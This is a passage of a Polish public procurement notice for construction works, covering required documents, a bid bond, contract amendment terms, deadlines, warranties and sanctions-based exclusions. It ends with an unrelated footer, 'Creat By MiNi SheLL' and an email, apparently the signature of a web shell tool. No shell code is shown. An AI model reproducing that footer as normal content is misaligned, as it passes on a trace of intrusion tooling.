ofertowe.<br/>4)	Tabelę elementów scalonych (wygenerowaną przez program kosztorysowy)<br/>5)	Oświadczenie w zakresie wypełniania obowiązków informacyjnych przewidzianych <br/>w art. 13 lub art. 14 RODO (Załącznik nr 10 do SWZ) – oddzielnie składa Wykonawca, Lider konsorcjum, Partner/rzy konsorcjum, wspólnicy spółki cywilnej, podmiot udostępniający zasoby, podwykonawca<br/>6)	Oświadczenie o wykonaniu wykazu urządzeń do serwisowania (Załącznik nr 8 do SWZ).<br/>7)	Oświadczenie Wykonawcy o zatrudnieniu pracowników na podstawie umowy o pracę (Załącznik nr 11 do SWZ).<br/>8)	Zobowiązanie podmiotu udostepniającego zasoby, lub inny dokument, w przypadku powołania się przez Wykonawcę na zasoby innych podmiotów udostepniających zasoby (Załącznik nr 7 do SWZ).<br/>9)	Oświadczenie Wykonawcy o zastosowanych materiałach i urządzeniach równoważnych (Załącznik nr 21 do SWZ). – tylko w przypadku zastosowania przez Wykonawcę materiałów i urządzeń równowaznych<br/>10)	Oświadczenie, z którego wynika jakie roboty budowlane wykonają poszczególni Wykonawcy ( w przypadki Wykonawców wspólnie ubiegających się o zamówienie) – Załącznik nr 22 do SWZ.<br/>11)	Pełnomocnictwo – jeśli dotyczy<br/>12)	Samooczyszczenie – jeśli dotyczy<br/>13)	Zastrzeżenie tajemnicy przedsiębiorstwa - jeśli dotyczy<br/>14)	Dowód wniesienia wadium. <br/>W przypadku dokonania przelewu bankowego zaleca się załączenie do oferty dokumentu potwierdzającego wniesienie wadium w pieniądzu. <br/>W przypadku wnoszenia wadium w formie gwarancji oryginał dokumentu gwarancyjnego w postaci elektronicznej opatrzony podpisem przez jego wystawcę (ubezpieczyciela). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca obowiązany jest wnieść wadium wysokości 4 500,00 zł przed upływem<br/>terminu składania ofert.<br/>2. Wniesione wadium musi zabezpieczać cały okres związania ofertą <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie.<br/>2) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania ich<br/>w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia<br/>publicznego. Zaleca się aby pełnomocnikiem był jeden z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Pełnomocnictwo może być udzielone<br/>w szczególności:<br/>a) łącznie przez wszystkich Wykonawców (jeden dokument),<br/>b) oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców).<br/>W każdym jednak przypadku w treści dokumentu pełnomocnictwa zaleca się wymienić<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>udzielających pełnomocnictwa oraz złożyć wraz z ofertą.<br/>3) Wszelka korespondencja oraz rozliczenie dokonywane będą wyłącznie<br/>z pełnomocnikiem. Wykonawcy wspólnie ubiegający się o zamówienie, których oferta<br/>zostanie uznana za najkorzystniejszą zobowiązani są przed podpisaniem umowy<br/>zawrzeć konsorcjum w formie cywilno-prawnego porozumienia. Przed zawarciem<br/>umowy Zamawiający może żądać kopii umowy regulującej współpracę tych<br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonania zmian (zgodnie z art. 455 ust. 1<br/>ustawy PZP) postanowień zawartej umowy w następujących przypadkach:<br/>1) zmiany danych Wykonawcy takich jak zmiana nazwy (jeśli nie oznacza<br/>przekształcenia podmiotowego lub przedmiotowego) siedziby, adresu, numeru<br/>konta bankowego, wynikające ze zmian wpisów w ewidencji działalności<br/>gospodarczej lub Krajowego Rejestru Sądowego<br/>2) zmiany przedstawicieli Stron i osób upoważnionych - w przypadku<br/>nieprzewidzianych zdarzeń losowych m.in. takich jak choroba, śmierć, ustanie<br/>stosunku pracy, zmiana pełnomocnictwa do nadzorowania i koordynowania<br/>realizacji Umowy,<br/>3) zmiany Podwykonawcy lub wprowadzenie nowego Podwykonawcy, rezygnacji<br/>z podwykonawstwa, zmiany zakresu podwykonawstwa - pod warunkiem uzyskania<br/>zgody Zamawiającego. Zamawiający zaakceptuje i wyda zgodę na zmianę<br/>Podwykonawcy na zasadach określonych w § 16 Umowy, w przypadku gdy otrzyma<br/>potwierdzenie rozliczenia się Wykonawcy z poprzednim Podwykonawcą<br/>4) zmiany Wykonawcy - gdy nowy wykonawca zastępujący dotychczasowego spełnia<br/>wymagania Zamawiającego wynikające z udzielonego zamówienia<br/>a) połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub sukcesji,<br/>dziedziczenia lub nabycia dotychczasowego Wykonawcy lub jego<br/>przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału<br/>w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie<br/>pociąga to za sobą innych istotnych zmian umowy;<br/>b) przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego<br/>podwykonawców.<br/>6) zmiany finansowania na skutek ewentualnego braku płynności finansowania robót<br/>lub zmiany wielkości limitu finansowego określonego w zatwierdzonym Centralnym<br/>Planie Inwestycji Budowlanych Ministerstwa Obrony Narodowej na dany rok<br/>budżetowy, tj. zmian, które nastąpiły po dniu podpisania umowy<br/>7) zmiany wynagrodzenia i terminu realizacji zamówienia (zmniejszenie,<br/>zwiększenie) w przypadku:<br/>a) wstrzymania Prac bądź części Prac przez Zamawiającego z przyczyn leżących<br/>po stronie Zamawiającego. Termin wykonania umowy może ulec zmianie o<br/>okres nie dłuższy niż okres wstrzymania robót budowlanych;<br/>b) wystąpienia Siły Wyższej lub innych okoliczności niezależnych od Wykonawcy<br/>lub których Wykonawca przy zachowaniu należnej staranności nie był w stanie<br/>uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia<br/>w wykonaniu Przedmiotu Umowy spowodowane przez osobę trzecią – o czas<br/>działania Siły Wyższej oraz czas potrzebny do usunięcia skutków jej działania<br/>oraz usunięcia przeszkód, także w zakresie wysokości Wynagrodzenia;<br/>c) zmian w zakresie rzeczowym Przedmiotu Umowy, które warunkują wykonanie<br/>całości zamówienia (w tym zmian materiałowych), wykonania zamiennych bądź zwiększających zakres zadania robót, wynikających z narad technicznych,<br/>inwentaryzacji stanu istniejącego, aktualizacji Dokumentacji Projektowej<br/>d) wykonanie robót dodatkowych, zamiennych, koniecznych do prawidłowego<br/>wykonania Przedmiotu Umowy;<br/>e) konieczności skoordynowania robót budowlanych z innymi inwestycjami<br/>realizowanymi na terenie Kompleksu;<br/><br/>Ze względu na ograniczoną ilość miejsca - Zamawiający informuje, że pełne dane dot. rodzaju i zakresu zmian umoway oraz warunków ich wprowadzania znajdują się w SWZ oraz wzorze umowy do niniejszego postępowania umieszczonego na stronie internetowej prowadzonego postepowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/szi</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-16 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia<br/>1) Termin zakończenia robót budowlanych potwierdzonych spisanym Protokołem<br/>Odbioru: maksymalnie 100 dni od daty podpisania umowy<br/>2) Wymagany okres gwarancji na wykonane roboty budowlane: 60 miesięcy od daty<br/>spisania Protokołu Odbioru<br/>3) Wymagany okres rękojmi na wykonane roboty budowlane - 60 miesięcy od daty<br/>spisania Protokołu odbioru<br/>4) Serwis gwarancyjny i konserwacja urządzeń wchodzących w skład przedmiotu umowy:<br/>12 miesięcy począwszy od dnia spisania Protokołu Odbioru<br/>5) Gwarancja na wbudowane urządzenia zgodnie z gwarancją udzieloną przez<br/>producenta urządzeń (bieg terminu gwarancji rozpocznie się od dnia spisania<br/>Protokołu Odbioru)<br/><br/>Zamawiający na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz. U. 2022 poz. 835) wyklucza:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym<br/>w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba<br/>wymieniona w wykazach określonych w rozporządzeniu 765/2006<br/>i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem<br/>rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą<br/>w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r.<br/>o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot<br/>wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie<br/>decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu

Creat By MiNi SheLL
Email: jattceo@gmail.com